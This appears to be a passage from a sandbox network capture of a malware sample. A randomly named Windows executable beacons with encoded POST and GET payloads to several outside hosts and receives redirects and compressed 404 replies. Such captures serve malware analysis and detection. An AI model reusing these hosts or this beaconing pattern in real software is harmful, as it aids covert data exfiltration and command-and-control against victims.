5 | 192.168.2.9 | 54115 | 217.116.0.191 | 80 | 1808 | C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
Timestamp | Bytes transferred | Direction | Data
Aug 18, 2024 18:25:10.836031914 CEST | 695 | OUT | POST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=WP4U85Q8ICnvEe252mSEJalk+WxHCSThcL9Y/hkJcASRj//uzrz9o4QjPIVwQ6i8PFImbvjAezMr0mfUXWRqCi+6Nh7L5W8bBCcox4zoRB5bClDn16Fa67d+HGF5+kHXSDt/WmKxT5nxOK7u3iLZI5GxOEiQFA387Gfm2s7Xs/808+0M9WiLf8NTT9E2
                                                      Aug 18, 2024 18:25:11.551311970 CEST  572 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:11 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session ID: 6  Source IP: 192.168.2.9  Source Port: 54116  Destination IP: 217.116.0.191  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:13.373100042 CEST  719 bytes  OUT  POST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=WP4U85Q8ICnvF/G57l6EcqlnnWxHJyTtcL5Y/kcZd2CRibzuyuf9v4QjX4V1eairPFMfbqbAezIr0jbUXhFtCy+4VR7z328bBCcox4mDRFVbBUzn1bFVmLd5OmF5p0GcSDsQWnWbT7fxOPXu5X3aC5GzAkiFPgeDiVDlo8nt9dYc2/USskrQKrN0UaNe1lMwFjCnCEckso54akx5Jw==
                                                      Aug 18, 2024 18:25:14.036062956 CEST  572 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:13 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session ID: 7  Source IP: 192.168.2.9  Source Port: 54117  Destination IP: 217.116.0.191  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:15.903558969 CEST  1732 bytes  OUT  POST /7ffx/ HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.lecoinsa.net
                                                      Referer: http://www.lecoinsa.net/7ffx/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:16.688044071 CEST  572 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:16 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/
                                                      Data Ascii: 15a<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/'" /> <title>Redirecting to http://lecoinsa.net/7ffx/</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/">http://lecoinsa.net/7ffx/</a>. </body></html>0


                                                      Session ID: 8  Source IP: 192.168.2.9  Source Port: 54118  Destination IP: 217.116.0.191  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:18.434490919 CEST  438 bytes  OUT  GET /7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.lecoinsa.net
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:19.127294064 CEST  1236 bytes  IN  HTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:19 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 922
                                                      Connection: close
                                                      Location: http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&gta=rzqXf4A02FEl_8
                                                      Age: 0
                                                      X-Cache: MISS
                                                      X-BKSrc: 0.6
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8'" /> <title>Redirecting to http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8</title> </head> <body> Redirecting to <a href="http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0FsHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8">http://lecoinsa.net/7ffx/?dZo=bNQ0/ONSUiz8Cvet9WekHsY6glAUeAndZ9NU1FoLXha3tv70s5bqu4Q6Bv5eGpaoTDYvbrT1RjV74F6wZTVOWwD/JAve0F
                                                      Aug 18, 2024 18:25:19.127311945 CEST  70 bytes  IN
                                                      Data Ascii: sHL38A7prpbz1xNEjliw==&amp;gta=rzqXf4A02FEl_8</a>. </body></html>


                                                      Session ID: 9  Source IP: 192.168.2.9  Source Port: 54119  Destination IP: 3.33.130.190  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:24.238148928 CEST  692 bytes  OUT  POST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=3ubKFab14mRwzMMtR8ofkLZcTubhUTQpzdoceDhIozblRLoZ0FS1ti75KtcMzFp8i0Y4k4Cc2TAom8/ilkkxOakyc7tpvFj6SfwpIDYxQ34e0P/AdoBe/2A0lCfjh8q6CW3IUi6iohLR4ShxBgTVBmTi59xsvvDSOmTABk9TACakoxy4vIDnzlURHGaV


                                                      Session ID: 10  Source IP: 192.168.2.9  Source Port: 54120  Destination IP: 3.33.130.190  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:26.779285908 CEST  716 bytes  OUT  POST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=3ubKFab14mRw1sctCL0fjrZfcObhaDQlzdkceAtYpBPlRqYZ1BO1ui75S9cJ+lp7i0VPk4uc2TEom+nikX8yPKk0Vbtvilj6SfwpIDkXQxQe163AcJBd5GA3iCfjzMq2CW3hUjnPoizR4TRxAxTWLmTgktwprfKAGRCVZGcwdlqDrQSm+6K8myU2AhT94WcM/O5s3zA4LpW2ZUJneg==


                                                      Session ID: 11  Source IP: 192.168.2.9  Source Port: 54121  Destination IP: 3.33.130.190  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:29.312855005 CEST  1729 bytes  OUT  POST /1nsp/ HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.8xbe578.app
                                                      Referer: http://www.8xbe578.app/1nsp/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                      Session ID: 12  Source IP: 192.168.2.9  Source Port: 54122  Destination IP: 3.33.130.190  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:31.840135098 CEST  437 bytes  OUT  GET /1nsp/?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8 HTTP/1.1
                                                      Host: www.8xbe578.app
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Language: en-US,en
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Aug 18, 2024 18:25:33.232374907 CEST  394 bytes  IN  HTTP/1.1 200 OK
                                                      Server: openresty
                                                      Date: Sun, 18 Aug 2024 16:25:33 GMT
                                                      Content-Type: text/html
                                                      Content-Length: 254
                                                      Connection: close
                                                      Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dZo=6szqGuj1zCBS7eEWPK4Hj+gRK/nLAiE2u/M2YSpUojnZUd8wkmCllhvxE7Evl1FAmV96l4GO8z837fuNk080e6UseLZVk0HIGeIsBEAgRXg1wr3NJQ==&gta=rzqXf4A02FEl_8"}</script></head></html>


                                                      Session ID: 13  Source IP: 192.168.2.9  Source Port: 54123  Destination IP: 109.95.158.127  Destination Port: 80  PID: 1808  Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                      Timestamp  Bytes transferred  Direction  Data
                                                      Aug 18, 2024 18:25:38.362489939 CEST  701 bytes  OUT  POST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 192
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Ascii: dZo=cmHr04oQ6fWhPKYZRKonoMZnWz/mCJKI5sYe864gX0Kke1N+i0b2l8NuWagqK+lLWhgR8huGFYJyMJQCwwKz5T06+oCzWExCov1PgXAr+JsbF63mK8Its4wpUY86RdK+5xH/NHePKUxTlLRC6hSjDrCsTtqS6WBulhJe4ACoLvl+Nirvr61WrAhHvlee
                                                      Aug 18, 2024 18:25:39.036468983 CEST  1043 bytes  IN  HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:38 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                       Session ID: 14 | Source IP: 192.168.2.9 | Source Port: 54124 | Destination IP: 109.95.158.127 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:25:40.908099890 CEST | 725 | OUT | POST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 216
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 48 69 6b 66 56 64 2b 77 78 37 32 6b 38 4e 75 64 36 67 72 45 65 6c 51 57 68 6c 73 38 67 2b 47 46 5a 74 79 4d 49 67 43 77 42 4b 77 72 54 30 34 6c 34 43 78 59 6b 78 43 6f 76 31 50 67 58 56 77 2b 4e 41 62 45 4a 76 6d 4a 5a 38 75 6c 59 77 71 43 49 38 36 48 64 4c 31 35 78 48 52 4e 43 48 59 4b 52 31 54 6c 4c 42 43 2b 6b 79 67 4b 72 43 71 66 39 72 51 2b 6b 73 39 39 44 4e 30 77 44 43 5a 5a 2b 6c 4f 44 6a 4c 78 36 49 38 4e 2b 58 68 67 6f 43 58 32 78 4f 79 6b 34 71 35 2b 32 32 77 43 67 67 70 35 49 47 41 2b 6f 77 3d 3d
                                                      Data Ascii: dZo=cmHr04oQ6fWhJqIZBbon5sYVZT/mMpKM5rQe87swXHikfVd+wx72k8Nud6grEelQWhls8g+GFZtyMIgCwBKwrT04l4CxYkxCov1PgXVw+NAbEJvmJZ8ulYwqCI86HdL15xHRNCHYKR1TlLBC+kygKrCqf9rQ+ks99DN0wDCZZ+lODjLx6I8N+XhgoCX2xOyk4q5+22wCggp5IGA+ow==
                                                       Aug 18, 2024 18:25:41.578433990 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:41 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                       Session ID: 15 | Source IP: 192.168.2.9 | Source Port: 54125 | Destination IP: 109.95.158.127 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Aug 18, 2024 18:25:43.450443029 CEST | 1738 | OUT | POST /8unq/ HTTP/1.1
                                                      Host: www.synergon.space
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en
                                                      Origin: http://www.synergon.space
                                                      Referer: http://www.synergon.space/8unq/
                                                      Content-Length: 1228
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Connection: close
                                                      Cache-Control: no-cache
                                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                      Data Raw: 64 5a 6f 3d 63 6d 48 72 30 34 6f 51 36 66 57 68 4a 71 49 5a 42 62 6f 6e 35 73 59 56 5a 54 2f 6d 4d 70 4b 4d 35 72 51 65 38 37 73 77 58 42 36 6b 66 6a 52 2b 7a 58 7a 32 6a 38 4e 75 51 61 67 75 45 65 6c 64 57 6c 78 67 38 6c 6d 34 46 62 6c 79 4d 71 6f 43 32 7a 69 77 68 54 30 34 73 59 43 77 57 45 78 58 6f 76 6c 51 67 58 46 77 2b 4e 41 62 45 50 44 6d 64 63 49 75 6a 59 77 70 55 59 38 6d 52 64 4c 64 35 31 72 6e 4e 47 61 6c 4b 46 42 54 6b 71 78 43 34 41 53 67 46 72 43 6f 65 4e 72 79 2b 6b 68 6c 39 41 34 48 77 41 66 4d 5a 34 56 4f 42 58 4b 53 6f 71 6b 67 6a 58 39 4d 76 68 2f 75 31 4c 71 67 6d 34 67 43 76 44 67 43 2f 7a 63 36 4a 6a 70 72 31 42 78 6b 6f 64 68 49 51 32 48 69 2f 50 33 57 74 4f 50 41 39 30 39 73 62 64 31 58 73 70 6b 4d 53 6f 4f 6c 4c 56 61 36 2f 4d 4b 77 35 75 2f 74 32 74 43 4d 51 42 33 76 48 6c 42 44 6f 53 67 51 2f 78 30 74 56 52 70 59 4d 76 67 70 56 64 58 6f 48 38 37 33 36 52 67 6d 56 32 65 6e 54 6a 48 70 36 48 77 44 39 54 7a 57 59 6c 31 37 50 42 79 53 79 6e 50 44 68 50 54 75 6e 55 4c 5a 61 58 [TRUNCATED]
                                                       Data Ascii: dZo= [TRUNCATED]
                                                       Aug 18, 2024 18:25:44.121920109 CEST | 1043 | IN | HTTP/1.1 404 Not Found
                                                      Connection: close
                                                      x-powered-by: PHP/5.6.40
                                                      content-type: text/html; charset=UTF-8
                                                      content-length: 810
                                                      content-encoding: br
                                                      vary: Accept-Encoding
                                                      date: Sun, 18 Aug 2024 16:25:44 GMT
                                                      server: LiteSpeed
                                                      Data Raw: c2 18 01 80 5c 3a ad 5e 33 2a fa 1d 7b ae 23 c8 f8 22 b6 f9 58 a6 54 2f 68 01 11 24 46 5a 07 b8 b9 aa f8 a2 fc fa db af d2 f4 fb cd 10 12 21 d1 e2 b3 84 6a fa 44 48 66 cf 70 4f 44 b5 eb 1c a1 30 89 4b 75 9e 17 17 17 f7 90 4d df 4d e4 1b a7 cc 91 cc 1d 64 1e 25 03 50 06 cd 54 a2 59 af 5a 72 30 c8 e3 d0 42 fd 72 07 58 ca e6 e1 e1 61 c1 08 db 3a 0d 36 30 34 0d 2b 73 18 37 12 7f 8b 01 ff 54 85 cb a6 e8 8b 0f 19 55 8b 3e 10 1f 2c b8 58 5a de e4 8b 23 b7 ea f9 08 dd ba c0 c6 36 c9 34 3c 82 fa 3d 45 4e 56 65 de 68 41 78 d7 a9 4f ae 74 ec 9b d4 70 00 b0 46 60 bc 00 f4 46 36 3c 50 41 e3 3f 81 18 26 a7 81 e7 11 50 7b 0a 34 82 35 04 8b c5 4e 1f 3b 82 60 fe fd 80 ff bf 51 93 85 40 fe 6c 02 7c ff fe dd 24 a4 7c f4 0f 49 81 f9 60 6c 1f 01 e6 27 13 0c 93 7e 94 a2 76 96 73 d8 64 d3 05 4e e4 35 5a 8c 20 d0 78 77 52 14 e0 7b d5 7a bb dd ee a4 60 ba 70 ec ed f4 80 0d 78 0f 29 9e a4 30 63 f3 28 45 8d 62 25 57 d3 e5 96 67 60 de ba 13 f9 08 30 c7 8a cd 89 1e 81 aa 53 4a 11 7f 84 90 4f 68 cd 9e 42 45 aa 06 66 17 9e a4 58 [TRUNCATED]
                                                      Data Ascii: \:^3*{#"XT/h$FZ!jDHfpOD0KuMMd%PTYZr0BrXa:604+s7TU>,XZ#64<=ENVehAxOtpF`F6<PA?&P{45N;`Q@l|$|I`l'~vsdN5Z xwR{z`px)0c(Eb%Wg`0SJOhBEfXUQ[un468f'YhoJ">)ZzP(WDr&Z'lLe*[H,Ei=qEk4'Ci8BOp>CtpK)D@laRepMx@j`xVH!D|Nl7&a2G<gzrjA%X$D*k(b8}O)K3e.{AIdZ_T$T^h>B,cOZ6rB}Qbmcg"-RYbxghvli"F9[)FOXp,j~=uq}F)F_-QS6qiPH


                                                       Session ID: 16 | Source IP: 192.168.2.9 | Source Port: 54126 | Destination IP: 109.95.158.127 | Destination Port: 80 | PID: 1808 | Process: C:\Program Files (x86)\hpRohCboeqYAJlSzSonFejEUWVlBGgOvjXByvWqOvxCEjqOwMLeTrrYTBhTfLKI\XraVxjqYYo.exe
                                                       Timestamp | Bytes transferred | Direction | Data
